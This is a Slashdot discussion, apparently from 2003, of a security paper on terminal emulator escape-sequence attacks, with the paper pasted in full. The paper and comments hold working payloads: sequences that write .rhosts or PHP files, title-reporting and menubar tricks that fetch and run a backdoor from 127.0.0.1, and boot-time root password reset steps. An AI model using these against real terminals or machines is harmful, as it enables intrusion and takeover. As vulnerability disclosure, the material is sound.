Getting Hacked Through Your Terminal

hdm writes "My company recently published a paper on security issues with common terminal emulator applications. The interesting thing about these vulnerabiltiies is that many of them only require the victim to be running tail on their log files (apache, syslog, etc) for the attack to be successful. The paper (TXT) can be found here."

Most exploits

[$$$exy+Gwen+Stefani]

Most exploits that existed over 5 yrs ago are still valid.

For instance, you can recover a root password in just 10-15 minutes on ANY machine.

Re:Most exploits

But exploits that require physical access to the machine don't really mean much to anyone truly interested in security.

~~~

Re:Most exploits

Flamebait? No. Here's some flamebait: Go piss up a rope, you moronic, crack smoking, piece of shit moderator!

See the difference? FUCKING IMBECILES!

Re:Most exploits

[kasperd]

For instance, you can recover a root password in just 10-15 minutes on ANY machine.

You shouldn't make such claims without any evidence.

Re:Most exploits

No, that's just a cheap street insult.

Re:Most exploits

[kesuki]

If you have physical access to a machine then yes, root password recovery takes 10-15 minutes. I seriously doubt it takes that little time to do it remotely, however.

Re:Most exploits

[cicadia]

No, that was a flame.

So, the original post was the bait that attracted your flame, and, therefore, flamebait.

The original moderation stands.

Re:Most exploits

Even less, reboot in single user mode and reset it. Duh....

Re:Most exploits

No, the original post didn't attract the flame--the moderation did. Thus, by your own logic, the moderation itself was flamebait. I'm glad to see we're in agreement here.

Re:Most exploits

If you think that rises to the level of the street insult, it's pretty obvious you've never had the misfortune of actually having received one.

Re:Most exploits

So, as evidence, you offer another claim.

Zen in the Art of Fallacious Argument indeed.

Re:Most exploits

[42forty-two42]

Here's how to do it on linux:

• Reboot the computer, somehow.
• Append 'init=/bin/sh' to the kernel command line at boot, then resume the boot. You will be dropped to a root shell.
• mount -t proc proc /proc
• mount -o remount,rw -t (root fs type) (root fs device) /
• passwd
• Enter the new password
• mount -o remount,ro -t (root fs type) (root fs device) /
• umount /proc
• exec /sbin/init
• The system will resume its boot. The root password will have been changed.

Re:Most exploits

[FyRE666]

As far as I'm aware you can't recover the root password in any reasonable timespan (unless it's badly chosen, or you have a few Earth Simulators handy). You can however change it in a couple of minutes if you have physical access to the machine (reboot to single user, mount fs, passwd). Hardly stealthy though...

Re:Most exploits

[H3lm3t]

Append 'init=/bin/sh' to the kernel command line at boot, then resume the boot. You will be dropped to a root shell.

Strange, I've always been told that one should put something in /etc/lilo.conf to prevent that ;)

password=foobar

Re:Most exploits

[dotgain]

Whoo gee, didn't know that!

To think I've thrown out four linux servers and a Sun E450 because I'd forgotten the root passwd on all of them, and thought I'd never be able to get in!!

Some exploit! It's been in the HOWTO's since year dot, yet still nobody has fixed this "vulnerability".

Re:Most exploits

[kasperd]

If you have physical access to a machine then yes, root password recovery takes 10-15 minutes.

There are lots of things you can easilly do with physical access to the computer, but finding the root password is not one of them. Unless something has been done to prevent it, I can bypass the root password in less than five minutes. Either pass an init argument to the kernel or boot from external media. Once the root password has been bypassed it can easilly be changed if I would want to.

Preventing boot from external media and boot arguments will slow down the process, and of course BIOS and bootloader must be password protected. But I can get a long way with a screwdriver unless the harddisk has been encrypted.

In case you want to prove your claim, please tell me what my root password is. Here is the line from my /etc/shadow file:

root:$1$3pzDB2kQ$5ZUFiFyOXsLUQ1/Ad9G7y1:12103:0:99 999:7:::

Re:Most exploits

[kasperd]

mount -o remount,rw -t (root fs type) (root fs device) /

Why make it so complicated? I'd just have typed: mount -o remount,rw /. And I don't think you need /proc to change the root password.

Re:Most exploits

BOSCO!

Re:Most exploits

[plugger]

Not quite that easy, at least on Debian:

Type root password for single-user access, or press CTRL-D for normal startup.

That isn't an exact quote, but the gist is correct. A CMOS reset and boot media would defeat this, though.

Re:Most exploits

[kesuki]

Well, when I said password recovery, what I meant is what I did the last time I forgot my root password on my laptop. I went in with a boot floppy and copy/pasted the admin password (which I still knew) over the root password. This is what normal people asssociate with password recovery, since only an insecure system (like IRC services) will tell you the 'old' password.
That being said, there Are tools that take an /etc/shadow file and spew out the password, they take a lot longer than 15 minutes to do so though.
I will tell you why that password can be broken. The key used to crypt the password is itself. There is a limit to the types of characters, and the number that can be used in a unix password. a bruteforce decryptor can be built that will try every possible combination, starting with the most likely root passwords, and essentially it's just a matter of waiting for the program to find the only string that decrypts the encrypted string to itself.
I don't have the patience nor the desire to run your shadow entry through a brute force decryptor... but the reason the shadow file exists is because on shell machines there are people with the patience and the desire to run those shadow entries through a brute force decryptor. Even if it takes them a week to get the password because the system had a relatively secure password.

Re:Most exploits

What are you, some cheap-ass version of $$$exyGirl?

I liked the toe-sucking pic, though. Thanks.

Re:Most exploits

[joto]

Well, uhmm...

This is a nice touch, but remember that it's only security by obscurity. If you have physical access to the machine, you can just as well boot from a floppy, or remove the harddisk and put it into some other computer booting from another disk.

Not that it isn't useful, though. Most sysadmins do give their users physical access to their desktop (or laptop) computers. But then the users are, at least to some degree, trusted...

Re:Most exploits

[dwayrynen]

even easier just append append rw to the end of the init=/bin/init command...

Darin

Re:Most exploits

[kasperd]

copy/pasted the admin password over the root password.
I don't know what system you are talking about, but my system surely doesn't have any kind of admin password, only a root password here.

This is what normal people asssociate with password recovery
Oh yeah? I don't see a logical reason why anybody would think password recovery would mean anything else than finding out what the password is.

There is a limit to the types of characters, and the number that can be used in a unix password.
Sure with systems still using DES based passwords there might be an issue. But with MD5 based passwords, this is not really a problem.

most likely root passwords
I take 16 chars from /dev/urandom, what password is the most likely then?

Re:Most exploits

[jo42]

"bEnDoVeRtAkEiTlIkEaMaN!"

Re:Most exploits

[kasperd]

"bEnDoVeRtAkEiTlIkEaMaN!"

That is not my password.

Re:Most exploits

[kesuki]

As a security measure only privaledged users are allowed to su to root. I always set up a system with an admin account that has the privaledge to su to root.

I don't see a single reason to logically define 'password recovery' as something so narrow as 'revealing the old password.' Afterall, replacing the old password with a new password is 'recovery' just as much as telling you what the old password was. Since you've still 'recovered' access to the account.

Haven't you even seen the movie hackers? The one thing they got right in that movie was the top three most commonly used passwords. I was merely pointing out that idealy a bute force decryptor would check those unsecure passwords first.

Re:Most exploits

[kasperd]

Haven't you even seen the movie hackers?

Yes.

The one thing they got right in that movie was the top three most commonly used passwords.

They didn't get much right. And I'm not so sure about that part with the passwords. Personally I'd never use such insecure passwords.

Re:Most exploits

[kesuki]

Personally I'd never use such insecure passwords.
you, me and the rest of slashdot, but what about your boss? (you know, the one who thinks Linux is some kid who plays the piano and is in love with lucy)
You might as well use a list of baby names for the average joe six-packs passwords, because they make them something they can't forget, like their kids name.
Most commonly used password. Secure passwords aren't common, by definition. Remember who 'god' (user) was? it was the chick that worked at that place. It wasn't the sysadmin, it was someone high up in the compnay who was braindead about security issues. Now, If they didn't get that part right I don't know what part of the movie they could have gotten right.

Re:Most exploits

I'd like to point out somethings you might want to know.
1. A truely random up to 4-16 digit password comprised of case sensitive alpha-numeric cobinations leaves approximately 61,581,291,280,182,164,914,311,732,480 'possible' combinations (a few million of which are absolutely worthless passwords like "0000").
2. There is no such thing as a comnputer generated truly random number. computers use seed numbers, and complex algorythms to produce 'seemingly random' results. If the culprit knows the algorythm, and knows what day you generated it, the possible number of combinations drops from that insanely high number to somewhere between a few thousand to a few billion possible combinations, depending on the complexity and sophistication of the algorytm.

you said specifically that you used a 16 digit password and used a linux urand generated 'predictablly random' password. If I knew the Exact time your system last booted, and the Exact time you generated the password there would be an astounding 1 possible password. Nice to know that I lack both of those tidbits of information, isn't it?
If I could make a reasonable guess at one of the two (eg: your webserver had it's uptime prominantly displayed somewhere) and I knew based on the version of your operating system that the password couldn't have been generated say, before last month, that signifigantly cuts down on the number mentioned in my first point.
Oh, since someone might mention this, there is on certain intel chipsets a 'random' number generator that uses RF noise to create random numbers. this is theoretically vulnerable to attack, by flooding the physical location with 'predetermined' RF noise, to make the outcome of the 'random' generation known. Also, since PCs themesves output RF noise, this method can be slightly less random than the developers at intel intended it to be.

Re:Most exploits

[kasperd]

If I knew the Exact time your system last booted, and the Exact time you generated the password

You are wrong. The kernel uses a 4096bit seed, and it combines random input from different sources including the timing of keyboard and mouse input. And the seed is saved at system shutdown and restored during boot. In total this means you need to know the exact keypresses and mouse movements I made in the two years passing from when I installed the system and until I generated the password. My password is truly random.

strings

[siliconshock.com]

just pipe your stuff through strings. it should help a bit

Re:strings

[irving47]

Nah. Someone will release a hack where you point a laser at it and decode the data passing through by the light bouncing off the string. Like getting the data through the LED's on a modem bank or switch

Re:strings

[siliconshock.com]

eh no... the strings command.

Re:strings

How bout you pipe both of yourselves to /dev/null .

A simple solution

[Giant+Ape+Skeleton]

Given the profliferation of exploits related to race conditions, predictible file creation, etc,
we should henceforth re-tool our code to only make use of stateless protocols!
;-)

Re:A simple solution

You mean like HTTP?
No-one was ever attacked through port 80.

Re:A simple solution

[Elbereth]

That was a joke, son.
About as sharp as a bag of potatoes, this one.

Re:A simple solution

[WNight]

I know this is a joke, but it's really worth thinking about for a second.

In a true stateless protocol people need to send a request that ammounts to "send me /etc/passwd" or "echo foo > /etc/...". You're unlikely to honor this and some simple checks can make sure you don't write to the wrong place.

Many bugs are in the user-identification and verification routines. Web sites let you do, if you've got the right cookie, nasty things that they shouldn't let you do. Not only does your initial verification need to be secure, but your storing of cookie data in such a way as to let the user back on, with access, needs to be fairly secure. Providing state introduces many bugs you otherwise wouldn't have.

Now, this isn't to say that everything should be stateless, but that you should think about how much time you save by letting people not enter their password at every use, versus the potential risks. Especially if you're coding the security sections yourself. Trusting .htaccess is pretty easy, Apache gets a lot of testing. Trusting your perl CGI script you coded the night before...

YOU ARE SO REHIRED!

[YOU+ARE+SO+FIRED!]

Good job out of you. Come on in, I'll have Betty make you some coffee.

In the meantime, is it my imagination or did this article just tell me how to place a file in the root directory of a webserver? If my employees ever did that I'd... well I'd.... fire them.

Not all terminal emulators were susceptible

[chongo]

For those who might be concerned (and in case the paper is /.-ed), the tested and found that the following terminal emulators were NOT susceptible to screen dump or window title attacks:

• xterm xf86 4.2.0 (patch 165)
• aterm 0.42
• rxvt 2.7.8
• Eterm 0.9.1
• konsole 3.1.0 rc5
• putty 0.53
• SecureCRT 3.4.6
• gnome-terminal 2.0.2 (libzvt 2.0.1) [2.2 indirectly]
• hanterm-xf 2.0

I always pre-filter my logs thru a Perl script. Besides removing verbose messages that are not useful, my filters replace such non-printable characters with a printable character. Not only does it make it easier to spot strange octets on the screen, it does not depend on the terminal emulator remaining secure.

Re:Not all terminal emulators were susceptible

Paste this in your PuTTY window then:

echo -e "\e]2;Stupid Title in PuTTY Window\a"

Re:Not all terminal emulators were susceptible

[Kludge]

What about my DEC VT240?

Re:Not all terminal emulators were susceptible

Doesn't work (v0.52). Sorry, chief.

Re:Not all terminal emulators were susceptible

That list is all of the applications that were tested, not the ones which weren't vulnerable...

Re:Not all terminal emulators were susceptible

[CableModemSniper]

This smells like a troll. The article said Eterm 0.9.1 and hanterm both were vurnerable iirc. It also said Eterm 0.9.2 had improved in the area, but that it should be given an award for being the most vulernerable. I'm kinda scared to use Eterm now.

Re:Not all terminal emulators were susceptible

[ibennetch]

odd, it works for me in 0.53b

Re:Not all terminal emulators were susceptible

[Moses+Lawn]

Funny, I just did that and it worked fine (putty 0.52). Didja type it right?

The article did mention that Putty was not really susceptible to screen dump attacks, because

Although putty would place the title onto the command-line, we were not able to find a method of hiding the command, since neither the "invisible" character attribute nor the foreground color could be set. Putty has a relatively low limit to the number of characters that can be placed into the window title, so it is not possible to simply flood the screen with garbage and hope the command rolls past the current view.

This doesn't mean putty is "secure", but it's not as insecure as some others. The baddies seem to be eterm and rxvt. There's a nice description of a compromise scenario via eterm at the bottom of the article.

Re:Not all terminal emulators were susceptible

I always pre-filter my logs thru a Perl script.
May be you'd be so kind to post it here so we can verify if you're trolling or telling the truth.
Thanks.

Re:Not all terminal emulators were susceptible

He/She just did ...

Re:Not all terminal emulators were susceptible

Still can't get it to work, but could be because I'm in winnt or because of my (mis?)configuration. I did notice while messing with settings that you can default the numeric keypad to 'Nethack' mode. Putty is such a fine product.

Re:Not all terminal emulators were susceptible

[Moses+Lawn]

You might need to set TERM to 'xterm'. I'm on w2k, btw, but I doubt it matters.

Putty is very cool, but I wish it's scrollback features were more -- robust.

Re:Not all terminal emulators were susceptible

[KainX]

If you'll read the follow-up conversation on BUGTRAQ (link posted above), you'll note that Eterm 0.9.2 is NOT vulnerable to the screen dump problem. I was also unable to create a scenario where the title bug could be exploited in such a way as to hide the command line that was imbedded in there, so the user would have to blindly hit Enter with a complete command line for the exploit sitting there. Only a severely ignorant user would do that.

You should also read about *why* Mr. Moore gave Eterm the "most vulnerable" award. The only reason he gave which hasn't been fixed for almost 2 years now was the quality and thoroughness of my documentation. :-)

Re:Not all terminal emulators were susceptible

[maquaro]

Yeah what about my DEC VT320.... :)

Re:Not all terminal emulators were susceptible

[KainX]

The baddies seem to be eterm and rxvt. There's a nice description of a compromise scenario via eterm at the bottom of the article.

Please note that the "case study" provided was contrived at best and damagingly inaccurate at worst. No official release of Eterm EVER could be used in the way they describe. Only people following CVS Eterm would ever have been open to such an attack, and those people would have updated to a fixed version almost 2 years ago.

The case study is intended to illustrate a "Worst Case Scenario" type situation, not be any sort of realistic portrayal of actual events.

Re:Not all terminal emulators were susceptible

[CableModemSniper]

oops. It figures, I post something derogatory about Eterm (which i love btw, thanks) and end up getting chewed out by the author. I wonder if this will get me bragging rights somewhere? :)

Re:Not all terminal emulators were susceptible

[KainX]

Didn't intend to chew anyone out; I apologize if it seemed that way. I just don't want people to be afraid to run Eterm because of the somewhat-outdated information (which Mr. Moore himself acknowledged) in the report. Just trying to make sure that the information out there is complete and accurate, that's all. :-)

Re:Not all terminal emulators were susceptible

[AstroJetson]

That's good to know. Yours is the best terminal emulator I've tried. I would hate life if I had to use anything but Eterm.

Re:Not all terminal emulators were susceptible

[42forty-two42]

I'm using konsole 1.2 in kde 3.1, is that affected?

Re:Not all terminal emulators were susceptible

No. How about reading the article?

Re:Not all terminal emulators were susceptible

[jaltman]

Kermit 95 from Columbia University is not vulnerable either.

Re:Not all terminal emulators were susceptible

[CableModemSniper]

No, I was kinda exaggerating. Frankly I thought it was kind of cool, in my adolecscent way. Kind of like "Dude! The guy who wrote Eterm, was all like 'your wrong!' on slashdot to me!". Heh. Don't mind me, I might just be nuts.

Re:Not all terminal emulators were susceptible

Not at all, the exploit it used was still present up to and including 0.9.1, which most distributions still shipped with until a couple months ago (some still do).

Re:Not all terminal emulators were susceptible

[muletool]

Is that a terminal and not an emulator

Re:Not all terminal emulators were susceptible

What about kterm, DAMN IT!?

moral of the story

Jim is good, and has thwarted the haxors. Let them run e-term!

In short...

If you are running any BSD, where OpenBSD would be the most obvious choice for really security concerned people, you are fine. If you're running some other syslog daemon, you might be screwed.

Windows? Well, windows don't even have syslogging like this - isn't the existing Windows 'sploits enough for you?! Sheesh, some are never satisfied... :-)

Re:In short...

[Moses+Lawn]

Windows? Well, windows don't even have syslogging like this - ...

Actually, Windows *does* have a logging feature, but, in typical Microsoft overdesigned-anal-retentive fashion, it's a pain in the ass to use. Look at "Event Viewer" in the Administrative Tools sometime. I forget the API, but you (the programmer) need to fill out some complex structures and do something-or-other unintuitive to dump a message to the log. To actually see it, you need to go through a scrolling list of messages marked "Information" and doubleclick one to see the actual text.

I don't think anyone actually uses this, other than driver writers and those with the plugs in the backs of their heads.

Re:In short...

[Waffle+Iron]

Look at the bright side: There was a thriving aftermarket for pricey NT event log tools. It provided a lot of programmers with high paying jobs. The byzantine API ensured job security. (That market may still be thriving; I haven't been paying attention lately.)

Similar situations existed for the registry, DCOM, performance counters, security model, etc., etc.

Re:In short...

[hardcode]

You need to compile a messages file using the mc.exe message compiler, then rc -r the output to a .rc file.

You need to regster the event source and either link the .rc file into the executable or into a .dll (for language specific error messages etc).

Damn, I remember being a Perl & Unix hacker, hot the fsck did I end up coding for Winblows XP???

Rich

Re:In short...

[Moses+Lawn]

Oh god, that's right. It's all coming back...

I remember looking at that whole business once and going back to logfiles. Although, the message/resource file business *is* a lot more maintainable and internationalizable, and the process isn't all *that* bad. Let's just say it's overkill for 90% of things.

Windows - the Ada mindset of software development!

Damn, I remember being a Perl & Unix hacker, hot the fsck did I end up coding for Winblows XP???

That nice big paycheck at the end of the week helps mitigate the pain and guilt, I've found. Of course, "big" and "mitigate" are relative words.

Re:In short...

[hardcode]

The pay helps, a lot, but hey, one day I might just take up mowing lawns for a living.

But I did just install XP of a 2MB per inute network link - I feel dirty... *grin*

"Fictitious Case Study"

[Jack+Porter]

OK, so the exploit descriptions seem real and interesting enough, but what was the point of such an over-the-top
"Fictitious Case Study"?

Reading that drivel about Andre and his l33t hax0r buddies totally removed the credibility the rest of the article had achieved!

Re:"Fictitious Case Study"

[drinkypoo]

The idea is probably to give a scenario so those weak on imagination have something to use to show their boss to explain why they should spend time on this issue.

Re:"Fictitious Case Study"

[deek]

Actually, I found the fictitious case study good because it highlights a practical scenario in which the escape codes were used to hack into another machine. It was relatively believable, except possibly for the convenient set of circumstances in which the hacker discovered information on remote computers.

I definitely thought it was a good addition to the report, though.

dave

Re:TXT?

[jmays]

However, you obviously knew what TXT meant.

In case of slashdotting...

[Coke+in+a+Can]

TERMINAL EMULATOR SECURITY ISSUES
Copyright © 2003 Digital Defense Incorporated
All Rights Reserved

[ Table of Contents ]

-- Summary
-- Disclaimer
-- Escape Sequences
-- Remote Exploitation
-- Screen Dumping
-- Window Title Reporting
-- Miscellaneous Issues
-- Terminal Defense
-- Tested Emulator Versions
-- Vulnerability Index
-- A Fictitious Case Study
-- References
-- Credits

[ Summary ]

Many of the features supported by popular terminal emulator software can be abused
when un-trusted data is displayed on the screen. The impact of this abuse can range from
annoying screen garbage to a complete system compromise. All of the issues below are
actually documented features, anyone who takes the time to read over the man pages or
source code could use them to carry out an attack.

[ Disclaimer ]

There is nothing new in this paper. The entire concept of exploiting a terminal by
supplying hostile input has been around for over 10 years now. Unix veterans and BBS
users have been exposed to this type of problem since the very beginning, a newsgroup
search can turn up all sorts of exploits, from the ever-popular "flash" program to the
abuse of logging features in xterm which were disabled in R5. Therefore the purpose of
this paper is to identify weaknesses in the current suite of popular terminal emulation
software, not to rehash an ancient problem.

[ Escape Sequences ]

Typically, an escape sequence is a series of characters starting with the ASCII escape
character (0x1B) and followed by a specific set of arguments. Escape sequences were
originally used to control display devices such as dumb terminals and have been extended
to allow various forms of interaction with modern operating systems. An escape sequence
might be used to change text attributes (color, weight), move the cursor position,
reconfigure the keyboard, update the window title, or manipulate the printer. Over the
years, many new features have been added that required enhancements to the terminal
emulator applications to support them.

[ Remote Exploitation ]

To exploit an escape sequence feature, an attacker must be able to display arbitrary data
to the victim's terminal emulator. While at first glance that may seem rather unlikely, the
attacker can take advantage of a number of small bugs in other applications to increase
their chance of success.

Just about every network service that uses syslog will pass remote data directly to the
daemon without filtering the escape character. The responsibility then lays on the syslog
daemon to strip the escape code before writing the log entry to the disk or terminal.
Although both the stock *BSD syslog daemons as well the sysklogd package filter escape
sequences, msyslog, syslog-ng, and the logging daemons supplied with many commercial
UNIX-based operating systems do not.

While sending data directly to a vulnerable syslogd or rwalld service is the most direct
form of attack, there are literally dozens of other ways to place hostile binary data onto
the terminal of a remote user. The Apache web server makes an effort to clean garbage
from its access logs, but it still allows escape characters to be injected into the error logs.
Many command-line network tools can be exploited by a hostile service response, some
examples of this is include wget, curl, ftp, and telnet.

Multi-user systems are especially vulnerable, as any user can send a system-wide
message under the default configuration of most operating systems. Placing the attack
data into the banner of a popular FTP server, telnet service, or message of the day file
will increase the chance of finding a valid target. Certain console email clients refuse to
display files when the content-type of an attachment is set to a unrecognized value, so the
user must save the file and then read it on the command line, often just using the standard
"cat" utility.

[ Screen Dumping ]

Eterm and rxvt both implement what they call the "screen dump" feature. This escape
sequence will cause an arbitrary file to be opened and filled with the current contents of
the terminal window. These are the only two tested emulators[1] that still had the ability
to write to files enabled by default. Although rxvt will ignore dump requests for existing
files, Eterm[2] will happily delete the file and then create it again. Although it is
technically the same feature, the OSC code used to trigger it is different between the two
emulators. For rxvt, the screen dump code is 55, for Eterm, it is 30. It is possible to
control the entire contents of the file by specifying the reset sequence, then the required
data, followed by the screen dump command.

$ echo -e "\ec+ +\n\e];/home/user/.rhosts\a"

The same approach can be used to create an authorized_keys file for SSH, a replacement
passwd file, or even a hostile PHP script written to the user's web directory. This attack
requires no interaction on the part of the user and would be very difficult to detect if done
correctly. The primary difference between this issue and some of the others mentioned in
this paper is that the actual "exploitation" happens on the system running the emulator
software, not the current system that the terminal is accessing. The code that is
responsible for opening the dump file is shown below. /* rxvt */
if ((fd = open(str, O_RDWR | O_CREAT | O_EXCL, 0600)) >= 0) /* Eterm */
unlink(fname);
outfd = open(fname, O_CREAT | O_EXCL | O_NDELAY | O_WRONLY, S_IRUSR | S_IWUSR);

[1] XFree86's xterm disabled an equivalent feature in X11R5 due to security concerns. It
can still be enabled with a compile-time option.

[2] Eterm actually disabled this in 0.9.2 (October 31, 2002), however many recent Linux
distributions still shipped with 0.9.1.

[ Window Title Reporting ]

One of the features which most terminal emulators support is the ability for the shell to
set the title of the window using an escape sequence. This feature was originally
implemented by DEC for DECterm and has since been added to most emulators in use
today. The easy way to set the window title of a terminal is using the echo command:

$ echo -e "\e]2;This is the new window title\a"

When the output of the above command is displayed on the terminal, it will set the
window title to that string. Setting the window title by itself is not much of a security
issue, however certain xterm variants (and dtterm) also provide an escape sequence for
reporting the current window title. This essentially takes the current title and places it
directly on the command line. Due to the way that most emulators processes the escape
sequence, it is not possible to embed a carriage return into the window title itself, so the
user would need to hit enter for it to process the title as a command. The escape sequence
for reporting the window title is:

$ echo -e "\e[21t"

At this point, the attacker needs to convince the user to hit enter for the "exploit" to
succeed. There are a number of techniques available to both hide the command and
encourage the user to "press enter to continue". The simplest is to just insert a prompt
followed by the "invisible" character attribute right before reporting the title. Another
method is to set the foreground and background colors to be the same (all black or white)
and hope the user hits the enter key when trying to determine what happened. The
following example for xterm demonstrates a sequence that downloads and executes a
backdoor while hiding the command line. The "Press Enter >" string should be changed
to something appropriate for the attack vector. Some likely candidates include "wget
internal error: press enter to continue" or "Error: unknown TERM, hit enter to continue".

$ echo -e "\e]2;;wget 127.0.0.1/.bd;sh .bd;exit;\a\e[21t\e]2;xterm\aPress Enter>\e[8m;"

Any terminal emulator that allows the window title to be placed on the command-line is
vulnerable to this attack. The applications which were confirmed vulnerable include
xterm, dtterm, uxterm, rxvt, aterm, Eterm, hanterm, and putty[1]. The tested applications
that did not allow the title to be written include gnome-terminal 2.0, konsole, SecureCRT,
and aterm.

[1] Although putty would place the title onto the command-line, we were not able to find
a method of hiding the command, since neither the "invisible" character attribute nor the
foreground color could be set. Putty has a relatively low limit to the number of characters
that can be placed into the window title, so it is not possible to simply flood the screen
with garbage and hope the command rolls past the current view.

[ Miscellaneous Issues ]

Eterm should be given an award for the "Easiest to Compromise" terminal emulator. The
developers based much of their code off of the rxvt and xterm source, so Eterm tends to
share the same problems as those two emulators as well. If you happen to be running a
CVS version of Eterm from between February 10th and May 8th of 2001, it was possible
to execute an arbitrary command just by displaying the following escape sequence:

$ echo -e "\e]6;73;command\a"

Fortunately, this feature never made it into an official release, the "fork-and-exec" ability
was replaced by the script action spawn() instead.

During the research process, a number of small bugs were found that would either lock
up the emulator completely or crash it. Although they can be disregarded as simple denial
of service attacks, they could be abused to prevent an administrator from seeing
subsequent logs during a compromise. In general, the code which processed application-
side input seemed to place little emphasis on sanitizing the data before passing it directly
to system-level functions. While there was some effort made to avoid standard buffer
overflows, much of the loop-based character processing appeared ripe for a denial of
service attack. An example of this is a bug in the DEC UDK processing of XFree86's
xterm application, the following command will place the process into a tight resource-
eating loop:

$ echo -e "\eP0;0|0A/17\x9c"

This bug was reported to xfree86@xfree86.org on December 17th, 2002 and no response
was received as of the publication of this writing. The hanterm application is also
vulnerable to this issue, as the code base started off as a direct copy of xterm.

Both rxvt and aterm support a feature known as the menuBar. This feature allows the user
to create drop-down menus at the top of the terminal screen using both menu
configuration files and escape sequences. Anyone able to display data on the terminal
could modify the menu entries in a way that would compromise the system when
accessed. This type of attack relies more on social engineering, but still provides a
potential entry point when nothing else is available. The example below will create a new
top-level menu item called "Special" with a single item labeled "Access", when clicked it
will download and execute a backdoor from http://127.0.0.1/.bd and exit the shell.

$ echo -e "\e]10;[:/Special/{Access} wget 127.0.0.1/.bd\rsh bd\rexit\r:]\a\e]10;[show]\a"

[ Terminal Defense ]

The ideal solution is to sanitize all data before displaying it on your terminal, however
without a custom terminal application or data filter, you can't guarantee that every tool
you use on the command-line is going to strip escape sequences. The responsibility
should rest on the actual terminal emulator; any features that allow file or command-line
access should be disabled by default and more attention should be paid to new features
that implement any use of escape sequences.

The tested terminal emulators that were not susceptible to the screen dump or window
title attacks include KDE's konsole, Gnome's gnome-terminal, Vandyke's SecureCRT,
and Sasha Vasko's aterm. Konsole and gnome-terminal each use their own independent
code-base and didn't try to support the same massive feature set as the others.
SecureCRT took a similar approach, emulating just the minimum needed to be usable.
With aterm, the code was originally based on rxvt, however many of the dangerous
features were removed as the project progressed.

[ Test Emulator Versions ]

xterm: xf86 4.2.0 (patch 165)
aterm: 0.42
rxvt: 2.7.8
Eterm: 0.9.1
konsole: 3.1.0 rc5
putty: 0.53
SecureCRT: 3.4.6
gnome-terminal: 2.0.2 (libzvt 2.0.1) [2.2 indirectly]
hanterm-xf: 2.0

[ Vulnerability Index ]

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned CVE
candidate namess for all issues described in this paper.

CAN-2003-0020 Apache Error Log Escape Sequence Injection

CAN-2003-0021 Screen Dump: Eterm
CAN-2003-0022 Screen Dump: rxvt

CAN-2003-0063 Window Title Reporting: xterm
CAN-2003-0064 Window Title Reporting: dtterm
CAN-2003-0065 Window Title Reporting: uxterm
CAN-2003-0066 Window Title Reporting: rxvt
CAN-2003-0067 Window Title Reporting: aterm
CAN-2003-0068 Window Title Reporting: eterm
CAN-2003-0069 Window Title Reporting: putty
CAN-2003-0070 Window Title Reporting: gnome-terminal
CAN-2003-0078 Window Title Reporting: hanterm-xf

CAN-2003-0071 DEC UDK Processing DoS: xterm
CAN-2003-0079 DEC UDK Processing DoS: hanterm-xf

CAN-2003-0023 Menubar Manipulation: rxvt
CAN-2003-0024 Menubar Manipulation: aterm

[ A Fictitious Case Study ]

Jim is the sole administrator for the web server farm at a moderately sized ISP. Most of
his company's clients maintain their own sites and Jim's primary responsibility is to keep
the web servers online and secured. Jim spends some of his spare time dabbling with
PHP and uses his workstation as his development system. The workstation is on the same
network segment as the rest of the servers and the firewall only allows TCP port 80 and
443 inbound. Jim has a new 2.5Ghz P4 and finally has enough processing power to run
the Enlightenment window manager with all the tweaks. His favorite part about
Enlightenment is the terminal emulator, Eterm, which lets him make the background
transparent and do all sorts of imaging tricks. Jim keeps a tail process running for the
error_log files on each server he manages, allowing him to easily spot script bugs and
misconfigurations before the customer calls him to fix it.

Andre is pissed. Some "friends" from his old hacking group have posted some
embarrassing photos of him on the group's home page. The page is hosted in the ~user
directory on a web server at some dinky ISP his old friend uses. He starts poking at the
web server only to give up about 30 minutes later after failing to find a single vulnerable
CGI or outdated service. He starts up Nmap again, this time on the whole class C that the
web server resides in, determined to take down the entire subnet if he has to. He finds
another web server, this one is running a traceroute gateway that is vulnerable to meta-
character injection. Andre manages to get an outbound shell back to a bounce system and
proceeds to poke around. He finds what appears to be an OpenSSH public key in the /tmp
directory, named JimH.pub. Looking at the key file, he sees that the userid stored in it is
for jim@jimsbox.weeisp.com. A quick check shows that jimsbox.weeisp.com not only
resolves to an external address, but is also running a web server.

The index page of Jim's web server consists of a couple pictures of him, some links to his
favorite news sites, some screenshots of his new super-leet desktop, and some of his
latest PHP projects. The first PHP project link Andre clicks on immediately starts
spewing errors, complaining about not being able to connect to the database. The error
message itself is interesting though, since it contains the full path to the script that
triggered the error. Andre makes a quick note of this and keeps digging around, hoping
for an easy entry point. As soon as he pulls up the desktop screen shots, he knows he
struck gold. The screen shot not only shows a scantily clad Italian model in the
background, but an Eterm open tailing the logs of the same server his pictures are being
served from. He gets to work, hitting the workstation with every tool he can find, but an
hour later he still hasn't busted a shell. While looking through the screen shots again,
Andre gets the idea to look at the Eterm documentation and see what other features it
supports. Not only is the documentation easy to read with plenty of examples, but it
mentions an interesting feature described as a "screen dump".

About two hours later, Andre finally manages to get Eterm and its 60 megabytes of
support libraries compiled. He discovers that to force Eterm to write out a file, all he has
to do is display a certain sequence of characters to the screen. The question now is how to
get those characters onto that Eterm at 4:30 in the morning. After a quick review of the
Apache source code, he finally finds a spot in the error handling code where he can inject
arbitrary data into the log files. All he has to do is send a request for a file with the escape
sequence he wants to use and Apache will write the unfiltered data directly to the log file.

Now that he can write arbitrary files to the workstation, he has to find a method of using
it to gain access. Andre is pretty sure that the workstation is running SSH, but the only
ports available are 80 and 443. He remembers that the PHP errors he saw earlier provided
the full path to the web root, if he can write files there, then he run commands through the
web server. Five minutes later, Andre is connecting to the target web server and sending
a GET request for a string generated with the following command:

$ echo -e "\ec\e]30;/home/www/htdocs/owned.php\a"

This command clears the current screen buffer, displays his hostile PHP code to the
screen, and then uses the screen dump command to write it into the web root. He points
his browser to http://jimsbox.weeisp.com/owned.php?c=id and starts the process of
rooting Jim's workstation, stealing his SSH keys, and taking those horrid pictures (as well
as the rest of the group's files) off of that web server.

[ References ]

This Paper and Associated Tools
--- http://www.digitaldefense.net/labs/whitepapers.htm l
--- http://www.digitaldefense.net/labs/securitytools.h tml

Recognized Escape Sequences
--- Eterm: http://www.eterm.org/docs/view.php?doc=ref
--- xterm: http://rtfm.etla.org/xterm/ctlseq.html
--- dtterm: http://hpc.uky.edu/cgi-bin/man.cgi?section=all&top ic=dtterm
--- rxvt: http://www.rxvt.org/refer/rxvtRef.html

Solar Designer's Post on Syslog Filtering
--- http://marc.theaimsgroup.com/?l=bugtraq&m=96938656 931350

ADM's "The Evil Escape Sequences"
